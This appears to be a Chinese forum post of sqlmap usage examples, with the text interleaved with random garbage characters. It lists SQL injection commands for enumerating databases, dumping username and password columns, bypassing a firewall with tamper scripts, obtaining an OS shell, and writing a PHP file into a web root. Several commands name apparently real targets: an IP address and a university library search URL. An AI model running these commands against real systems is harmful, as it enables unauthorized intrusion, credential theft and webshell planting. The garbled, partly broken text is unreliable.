sqlmap使用实例

admin

/pentest/database/sqlmap

' g  k9 M9 |( |+ Uupdate :::::>     in the folder   after  execute    following   order : svn update

sqlmap.py -r 1.txt --current-db
) s% W$ k; S" ]: F7 |& S# z
! A) l- W6 z  P, d5 p1 ]v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

- `6 ~7 l/ e. Q==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
6 m4 J" j5 [- O2 T% W0 {猜解数据库
./sqlmap.py -u "injection-url" --dbs
5 V4 l5 t& m  g; j: Qsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
- e! V. }. e7 q
5 C2 P, m( y3 w0 j猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables
" W+ L2 u3 x. e7 @' W' P  T: ]4 j
# H, Q* g4 m% c' z( X- ]0 Msqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
  G) \( c# ~$ R5 @( ?, b+ O$ O! Dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

* F. t* [' X+ k! J8 Fsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 b3 M8 \5 w9 L" T4 q
: ^! V' `) [' y# ^% ~6 {  p" ysqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
9 t! [( S9 ]2 R% osqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
/ w* k% c+ E6 x0 {8 B' t
6 [* j$ h- k7 e% h+ {" jsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
' R1 E# Y0 S4 W. osqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
2 l% i; y8 f% L3 H. i$ jsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
" a" u$ b& U- I# l' O, B* ^
1 \; h  S+ X* T( s8 G3 M4 Vsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
2 j% z# f8 }3 g* b% i. c* zsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
* \& {7 G( r0 F
2 C( r4 d' K* }/ U' a, Rsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
: h+ a# |: H, w* \% a3 ?1 \猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
, G. _1 q$ g* O4 k5 P$ m
4 o6 |5 I/ f1 ^8 U$ e! W6 zsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
9 b; r+ F% v; F7 i; S7 A- }
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
; N& ^2 m/ c" p; ~2 P&submit=Go
猜解值
0 k- f0 }. f, P" K. f" H& [$ q./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
9 O' ], e5 Z: \/ W# W2 E7 p========================================================
, M) ~5 h, A+ A1 Y7 c1 ^! x: G搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
& ]& I2 r, N/ g: ]& c1 f9 N/sqlmap.py -u "injection-url" --sql-shell
5 X  p1 j% x7 T' A读取指定文件（需权限）
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
# F" c0 Q! z6 b- m% F+ d查看当前 用户 及 数据库
+ a4 X2 W8 p7 Z8 C/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

8 t0 |# h& \! ?* @! Tsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
# Q5 I& e' O$ S& `: H+ Z# y2 }查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
读取所有数据库用户或指定数据库用户的密码
+ x$ ^5 ^6 X" |" R9 }5 l3 wsqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
7 ^% f$ y+ r5 M- S
/sqlmap.py -u "injection-url" --passwords -U root

--start&&--stop 与 --first&&--last 的区别
* _9 J$ U- ~; g8 A# E/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）
# C5 V& j) B- {. J* A$ O4 L" k
从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
2 J; U# k8 L2 @1 K7 a  D/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
- ^" F/ p$ O9 f& t9 ?4 {( B$ M/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
# z& W/ G7 T) ^- C* |# [2 a/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
: ^% o+ N  i! r' d+ b7 S0 l
4 D6 r/ r5 s! q# t